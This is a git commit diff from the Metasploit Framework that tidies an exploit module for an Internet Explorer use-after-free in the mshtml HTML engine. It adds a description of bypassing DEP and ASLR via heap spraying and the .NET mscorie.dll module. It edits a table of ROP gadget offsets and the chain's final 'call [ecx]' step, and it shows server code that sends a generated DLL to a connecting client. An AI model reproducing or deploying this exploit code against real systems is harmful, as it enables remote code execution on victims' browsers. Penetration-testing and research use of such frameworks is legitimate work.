
minor clean ups

git-svn-id: file:///home/svn/framework3/trunk@11397 4d416f70-5f16-0410-b530-b9f4589650da
Joshua Drake 2010-12-22 18:23:16 +00:00
parent 1407d7f1d5
commit 44c8a71dcf


@ -33,6 +33,11 @@ class Metasploit3 < Msf::Exploit::Remote
HTML engine (mshtml). When parsing an HTML page containing a recursive CSS
import, a C++ object is deleted and later reused. This leads to arbitrary
code execution.
This exploit utilizes a combination of heap spraying and the
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
opt-in to ASLR. As such, this module should be reliable on all Windows
versions.
},
'License' => MSF_LICENSE,
'Author' =>
@ -288,6 +293,7 @@ EOS
elsif request.uri =~ /\.dll$/
print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
# use it's contents ...
ibase = (0x2000 | rand(0x8000)) << 16
@ -330,11 +336,7 @@ EOS
'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b,
'leave / ret' => 0x25e5,
'ret' => 0x25e5+1,
'mov eax, [eax] / ret' => 0x22a2,
'mov [ecx], eax / xor eax, eax / pop esi / ret' => 0x360b9,
'call [ecx] / pop ebp / ret 0xc' => 0x1ec4,
'push eax / ret' => 0x1d1e4,
'pop eax / ret' => 0x5ba1,
'pop ebx / ret' => 0x54c0,
'pop ecx / ret' => 0x1e13,
@ -342,7 +344,6 @@ EOS
'pop edi / ret' => 0x2212,
'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6,
'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154,
'call [ecx]' => 0x1ec4
}
end
@ -389,7 +390,7 @@ EOS
rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret'
}
# Execute the payload ;)
rop_stack << 'call [ecx]'
rop_stack << 'call [ecx] / pop ebp / ret 0xc'
rop_stack.map! { |e|
if e.kind_of? String